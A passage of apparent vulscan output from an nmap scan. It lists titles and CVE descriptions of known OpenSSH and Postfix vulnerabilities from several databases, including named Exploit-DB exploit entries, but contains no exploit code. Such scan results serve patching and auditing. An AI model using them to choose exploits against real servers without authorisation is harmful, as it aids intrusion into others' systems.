10953| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
10954| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
10955| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
10956| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
10957| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
10958| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
10959| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
10960| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
10961| [75990] OpenSSH Login Handling Security Bypass Weakness
10962| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
10963| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
10964| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
10965| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
10966| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
10967| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
10968| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
10969| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
10970| [61286] OpenSSH Remote Denial of Service Vulnerability
10971| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
10972| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
10973| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
10974| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
10975| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
10976| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
10977| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
10978| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
10979| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
10980| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
10981| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
10982| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
10983| [30794] Red Hat OpenSSH Backdoor Vulnerability
10984| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
10985| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
10986| [28531] OpenSSH ForceCommand Command Execution Weakness
10987| [28444] OpenSSH X Connections Session Hijacking Vulnerability
10988| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
10989| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
10990| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
10991| [20956] OpenSSH Privilege Separation Key Signature Weakness
10992| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
10993| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
10994| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
10995| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
10996| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
10997| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
10998| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
10999| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
11000| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
11001| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
11002| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
11003| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
11004| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
11005| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
11006| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
11007| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
11008| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
11009| [6168] OpenSSH Visible Password Vulnerability
11010| [5374] OpenSSH Trojan Horse Vulnerability
11011| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
11012| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
11013| [4241] OpenSSH Channel Code Off-By-One Vulnerability
11014| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
11015| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
11016| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
11017| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
11018| [2917] OpenSSH PAM Session Evasion Vulnerability
11019| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
11020| [2356] OpenSSH Private Key Authentication Check Vulnerability
11021| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
11022| [1334] OpenSSH UseLogin Vulnerability
11023|
11024| IBM X-Force - https://exchange.xforce.ibmcloud.com:
11025| [83258] GSI-OpenSSH auth-pam.c security bypass
11026| [82781] OpenSSH time limit denial of service
11027| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
11028| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
11029| [72756] Debian openssh-server commands information disclosure
11030| [68339] OpenSSH pam_thread buffer overflow
11031| [67264] OpenSSH ssh-keysign unauthorized access
11032| [65910] OpenSSH remote_glob function denial of service
11033| [65163] OpenSSH certificate information disclosure
11034| [64387] OpenSSH J-PAKE security bypass
11035| [63337] Cisco Unified Videoconferencing OpenSSH weak security
11036| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
11037| [45202] OpenSSH signal handler denial of service
11038| [44747] RHEL OpenSSH backdoor
11039| [44280] OpenSSH PermitRootLogin information disclosure
11040| [44279] OpenSSH sshd weak security
11041| [44037] OpenSSH sshd SELinux role unauthorized access
11042| [43940] OpenSSH X11 forwarding information disclosure
11043| [41549] OpenSSH ForceCommand directive security bypass
11044| [41438] OpenSSH sshd session hijacking
11045| [40897] OpenSSH known_hosts weak security
11046| [40587] OpenSSH username weak security
11047| [37371] OpenSSH username data manipulation
11048| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
11049| [37112] RHSA update for OpenSSH signal handler race condition not installed
11050| [37107] RHSA update for OpenSSH identical block denial of service not installed
11051| [36637] OpenSSH X11 cookie privilege escalation
11052| [35167] OpenSSH packet.c newkeys[mode] denial of service
11053| [34490] OpenSSH OPIE information disclosure
11054| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
11055| [32975] Apple Mac OS X OpenSSH denial of service
11056| [32387] RHSA-2006:0738 updates for openssh not installed
11057| [32359] RHSA-2006:0697 updates for openssh not installed
11058| [32230] RHSA-2006:0298 updates for openssh not installed
11059| [32132] RHSA-2006:0044 updates for openssh not installed
11060| [30120] OpenSSH privilege separation monitor authentication verification weakness
11061| [29255] OpenSSH GSSAPI user enumeration
11062| [29254] OpenSSH signal handler race condition
11063| [29158] OpenSSH identical block denial of service
11064| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
11065| [25116] OpenSSH OpenPAM denial of service
11066| [24305] OpenSSH SCP shell expansion command execution
11067| [22665] RHSA-2005:106 updates for openssh not installed
11068| [22117] OpenSSH GSSAPI allows elevated privileges
11069| [22115] OpenSSH GatewayPorts security bypass
11070| [20930] OpenSSH sshd.c LoginGraceTime denial of service
11071| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
11072| [17213] OpenSSH allows port bouncing attacks
11073| [16323] OpenSSH scp file overwrite
11074| [13797] OpenSSH PAM information leak
11075| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
11076| [13264] OpenSSH PAM code could allow an attacker to gain access
11077| [13215] OpenSSH buffer management errors could allow an attacker to execute code
11078| [13214] OpenSSH memory vulnerabilities
11079| [13191] OpenSSH large packet buffer overflow
11080| [12196] OpenSSH could allow an attacker to bypass login restrictions
11081| [11970] OpenSSH could allow an attacker to obtain valid administrative account
11082| [11902] OpenSSH PAM support enabled information leak
11083| [9803] OpenSSH "
11084| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
11085| [9307] OpenSSH is running on the system
11086| [9169] OpenSSH "
11087| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
11088| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
11089| [8383] OpenSSH off-by-one error in channel code
11090| [7647] OpenSSH UseLogin option arbitrary code execution
11091| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
11092| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
11093| [7179] OpenSSH source IP access control bypass
11094| [6757] OpenSSH "
11095| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
11096| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
11097| [5517] OpenSSH allows unauthorized access to resources
11098| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
11099|
11100| Exploit-DB - https://www.exploit-db.com:
11101| [21579] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2)
11102| [21578] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1)
11103| [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
11104| [21314] OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability
11105| [20253] OpenSSH 1.2 scp File Create/Overwrite Vulnerability
11106| [17462] FreeBSD OpenSSH 3.5p1 - Remote Root Exploit
11107| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
11108| [6094] Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth)
11109| [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
11110| [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
11111| [1572] Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service
11112| [258] glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x
11113| [26] OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh)
11114| [25] OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool
11115|
11116| OpenVAS (Nessus) - http://www.openvas.org:
11117| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
11118| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
11119| [881183] CentOS Update for openssh CESA-2012:0884 centos6
11120| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
11121| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
11122| [870763] RedHat Update for openssh RHSA-2012:0884-04
11123| [870129] RedHat Update for openssh RHSA-2008:0855-01
11124| [861813] Fedora Update for openssh FEDORA-2010-5429
11125| [861319] Fedora Update for openssh FEDORA-2007-395
11126| [861170] Fedora Update for openssh FEDORA-2007-394
11127| [861012] Fedora Update for openssh FEDORA-2007-715
11128| [840345] Ubuntu Update for openssh vulnerability USN-597-1
11129| [840300] Ubuntu Update for openssh update USN-612-5
11130| [840271] Ubuntu Update for openssh vulnerability USN-612-2
11131| [840268] Ubuntu Update for openssh update USN-612-7
11132| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
11133| [840214] Ubuntu Update for openssh vulnerability USN-566-1
11134| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
11135| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
11136| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
11137| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
11138| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
11139| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
11140| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
11141| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
11142| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
11143| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
11144| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
11145| [100584] OpenSSH X Connections Session Hijacking Vulnerability
11146| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
11147| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
11148| [65987] SLES10: Security update for OpenSSH
11149| [65819] SLES10: Security update for OpenSSH
11150| [65514] SLES9: Security update for OpenSSH
11151| [65513] SLES9: Security update for OpenSSH
11152| [65334] SLES9: Security update for OpenSSH
11153| [65248] SLES9: Security update for OpenSSH
11154| [65218] SLES9: Security update for OpenSSH
11155| [65169] SLES9: Security update for openssh,openssh-askpass
11156| [65126] SLES9: Security update for OpenSSH
11157| [65019] SLES9: Security update for OpenSSH
11158| [65015] SLES9: Security update for OpenSSH
11159| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
11160| [61639] Debian Security Advisory DSA 1638-1 (openssh)
11161| [61030] Debian Security Advisory DSA 1576-2 (openssh)
11162| [61029] Debian Security Advisory DSA 1576-1 (openssh)
11163| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
11164| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
11165| [60667] Slackware Advisory SSA:2008-095-01 openssh
11166| [59014] Slackware Advisory SSA:2007-255-01 openssh
11167| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
11168| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
11169| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
11170| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
11171| [57492] Slackware Advisory SSA:2006-272-02 openssh
11172| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
11173| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
11174| [57470] FreeBSD Ports: openssh
11175| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
11176| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
11177| [56294] Slackware Advisory SSA:2006-045-06 openssh
11178| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
11179| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
11180| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
11181| [53788] Debian Security Advisory DSA 025-1 (openssh)
11182| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
11183| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
11184| [11343] OpenSSH Client Unauthorized Remote Forwarding
11185| [10954] OpenSSH AFS/Kerberos ticket/token passing
11186| [10883] OpenSSH Channel Code Off by 1
11187| [10823] OpenSSH UseLogin Environment Variables
11188|
11189| SecurityTracker - https://www.securitytracker.com:
11190| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
11191| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
11192| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
11193| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
11194| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
11195| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
11196| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
11197| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
11198| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
11199| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
11200| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
11201| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
11202| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
11203| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
11204| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
11205| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
11206| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
11207| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
11208| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
11209| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
11210| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
11211| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
11212| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
11213| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
11214| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
11215| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
11216| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
11217| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
11218| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
11219| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
11220| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
11221| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
11222| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
11223| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
11224| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
11225| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
11226| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
11227| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
11228|
11229| OSVDB - http://www.osvdb.org:
11230| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
11231| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
11232| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
11233| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
11234| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
11235| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
11236| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
11237| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
11238| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
11239| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
11240| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
11241| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
11242| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
11243| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
11244| [56921] OpenSSH Unspecified Remote Compromise
11245| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
11246| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
11247| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
11248| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
11249| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
11250| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
11251| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
11252| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
11253| [43745] OpenSSH X11 Forwarding Local Session Hijacking
11254| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
11255| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
11256| [37315] pam_usb OpenSSH Authentication Unspecified Issue
11257| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
11258| [34601] OPIE w/ OpenSSH Account Enumeration
11259| [34600] OpenSSH S/KEY Authentication Account Enumeration
11260| [32721] OpenSSH Username Password Complexity Account Enumeration
11261| [30232] OpenSSH Privilege Separation Monitor Weakness
11262| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
11263| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
11264| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
11265| [29152] OpenSSH Identical Block Packet DoS
11266| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
11267| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
11268| [22692] OpenSSH scp Command Line Filename Processing Command Injection
11269| [20216] OpenSSH with KerberosV Remote Authentication Bypass
11270| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
11271| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
11272| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
11273| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
11274| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
11275| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
11276| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
11277| [6601] OpenSSH *realloc() Unspecified Memory Errors
11278| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
11279| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
11280| [6072] OpenSSH PAM Conversation Function Stack Modification
11281| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
11282| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
11283| [5408] OpenSSH echo simulation Information Disclosure
11284| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
11285| [4536] OpenSSH Portable AIX linker Privilege Escalation
11286| [3938] OpenSSL and OpenSSH /dev/random Check Failure
11287| [3456] OpenSSH buffer_append_space() Heap Corruption
11288| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
11289| [2140] OpenSSH w/ PAM Username Validity Timing Attack
11290| [2112] OpenSSH Reverse DNS Lookup Bypass
11291| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
11292| [1853] OpenSSH Symbolic Link 'cookies' File Removal
11293| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
11294| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
11295| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
11296| [688] OpenSSH UseLogin Environment Variable Local Command Execution
11297| [642] OpenSSH Multiple Key Type ACL Bypass
11298| [504] OpenSSH SSHv2 Public Key Authentication Bypass
11299| [341] OpenSSH UseLogin Local Privilege Escalation
11300|_
1130125/tcp open smtp Postfix smtpd
11302| vulscan: VulDB - https://vuldb.com:
11303| [108975] Apple macOS up to 10.13.1 Postfix unknown vulnerability
11304| [98314] PostfixAdmin up to 3.0.1 AliasHandler delete.php gen_show_status denial of service
11305| [71720] Postfix up to 2.3.0 backup.php pacrypt sql injection
11306| [12746] Postfix Admin 2.3.6 functions.inc.php sql injection
11307| [57422] Postfix memory corruption
11308| [56843] Postfix up to 2.7.2 Cleartext weak encryption
11309|
11310| MITRE CVE - https://cve.mitre.org:
11311| [CVE-2013-2852] Format string vulnerability in the b43_request_firmware function in drivers/net/wireless/b43/main.c in the Broadcom B43 wireless driver in the Linux kernel through 3.9.4 allows local users to gain privileges by leveraging root access and including format string specifiers in an fwpostfix modprobe parameter, leading to improper construction of an error message.
11312| [CVE-2011-1720] The SMTP server in Postfix before 2.5.13, 2.6.x before 2.6.10, 2.7.x before 2.7.4, and 2.8.x before 2.8.3, when certain Cyrus SASL authentication methods are enabled, does not create a new server handle after client authentication fails, which allows remote attackers to cause a denial of service (heap memory corruption and daemon crash) or possibly execute arbitrary code via an invalid AUTH command with one method followed by an AUTH command with a different method.
11313| [CVE-2011-0411] The STARTTLS implementation in Postfix 2.4.x before 2.4.16, 2.5.x before 2.5.12, 2.6.x before 2.6.9, and 2.7.x before 2.7.3 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack.
11314| [CVE-2010-0230] SUSE Linux Enterprise 10 SP3 (SLE10-SP3) and openSUSE 11.2 configures postfix to listen on all network interfaces, which might allow remote attackers to bypass intended access restrictions.
11315| [CVE-2009-2939] The postfix.postinst script in the Debian GNU/Linux and Ubuntu postfix 2.5.5 package grants the postfix user write access to /var/spool/postfix/pid, which might allow local users to conduct symlink attacks that overwrite arbitrary files.
11316| [CVE-2008-4977] ** DISPUTED ** postfix_groups.pl in Postfix 2.5.2 allows local users to overwrite arbitrary files via a symlink attack on the (1) /tmp/postfix_groups.stdout, (2) /tmp/postfix_groups.stderr, and (3) /tmp/postfix_groups.message temporary files. NOTE: the vendor disputes this vulnerability, stating "This is not a real issue ... users would have to edit a script under /usr/lib to enable it."
11317| [CVE-2008-3889] Postfix 2.4 before 2.4.9, 2.5 before 2.5.5, and 2.6 before 2.6-20080902, when used with the Linux 2.6 kernel, leaks epoll file descriptors during execution of "non-Postfix" commands, which allows local users to cause a denial of service (application slowdown or exit) via a crafted command, as demonstrated by a command in a .forward file.
11318| [CVE-2008-3646] The Postfix configuration file in Mac OS X 10.5.5 causes Postfix to be network-accessible when mail is sent from a local command-line tool, which allows remote attackers to send mail to local Mac OS X users.
11319| [CVE-2008-2937] Postfix 2.5 before 2.5.4 and 2.6 before 2.6-20080814 delivers to a mailbox file even when this file is not owned by the recipient, which allows local users to read e-mail messages by creating a mailbox file corresponding to another user's account name.
11320| [CVE-2008-2936] Postfix before 2.3.15, 2.4 before 2.4.8, 2.5 before 2.5.4, and 2.6 before 2.6-20080814, when the operating system supports hard links to symlinks, allows local users to append e-mail messages to a file to which a root-owned symlink points, by creating a hard link to this symlink and then sending a message. NOTE: this can be leveraged to gain privileges if there is a symlink to an init script.
11321| [CVE-2007-3791] Buffer overflow in the w_read function in sockets.c in Cami Sardinha and Nigel Kukard policyd before 1.81 for Postfix allows remote attackers to cause a denial of service and possibly execute arbitrary code via long SMTP commands. NOTE: some of these details are obtained from third party information.
11322| [CVE-2006-0213] Kolab Server 2.0.1, 2.0.2 and development versions pre-2.1-20051215 and earlier, when authenticating users via secure SMTP, stores authentication credentials in plaintext in the postfix.log file, which allows local users to gain privileges.
11323| [CVE-2005-1127] Format string vulnerability in the log function in Net::Server 0.87 and earlier, as used in Postfix Greylisting Policy Server (Postgrey) 1.18 and earlier, and possibly other products, allows remote attackers to cause a denial of service (crash) via format string specifiers that are not properly handled before being sent to syslog, as demonstrated using sender addresses to Postgrey.
11324| [CVE-2005-0337] Postfix 2.1.3, when /proc/net/if_inet6 is not available and permit_mx_backup is enabled in smtpd_recipient_restrictions, allows remote attackers to bypass e-mail restrictions and perform mail relaying by sending mail to an IPv6 hostname.
11325| [CVE-2004-1113] SQL injection vulnerability in SQLgrey Postfix greylisting service before 1.2.0 allows remote attackers to execute arbitrary SQL commands via the (1) sender or (2) recipient e-mail addresses.
11326| [CVE-2004-1088] Postfix server for Apple Mac OS X 10.3.6, when using CRAM-MD5, allows remote attackers to send mail without authentication by replaying authentication information.
11327| [CVE-2004-0925] Postfix on Mac OS X 10.3.x through 10.3.5, with SMTPD AUTH enabled, does not properly clear the username between authentication attempts, which allows users with the longest username to prevent other valid users from being able to authenticate.
11328| [CVE-2003-0540] The address parser code in Postfix 1.1.12 and earlier allows remote attackers to cause a denial of service (lock) via (1) a malformed envelope address to a local host that would generate a bounce and contains the ".!" string in the MAIL FROM or Errors-To headers, which causes nqmgr to lock up, or (2) via a valid MAIL FROM with a RCPT TO containing a ".!" string, which causes an instance of the SMTP listener to lock up.
11329| [CVE-2003-0468] Postfix 1.1.11 and earlier allows remote attackers to use Postfix to conduct "bounce scans" or DDos attacks of other hosts via an email address to the local host containing the target IP address and service name followed by a "!" string, which causes Postfix to attempt to use SMTP to communicate with the target on the associated port.
11330| [CVE-2001-0894] Vulnerability in Postfix SMTP server before 20010228-pl07, when configured to email the postmaster when SMTP errors cause the session to terminate, allows remote attackers to cause a denial of service (memory exhaustion) by generating a large number of SMTP errors, which forces the SMTP session log to grow too large.
11331|
11332| SecurityFocus - https://www.securityfocus.com/bid/:
11333| [96142] PostfixAdmin CVE-2017-5930 Session Management Security Bypass Vulnerability
11334| [90814] Postfix Admin Multiple Cross Site Request Forgery Vulnerabilities
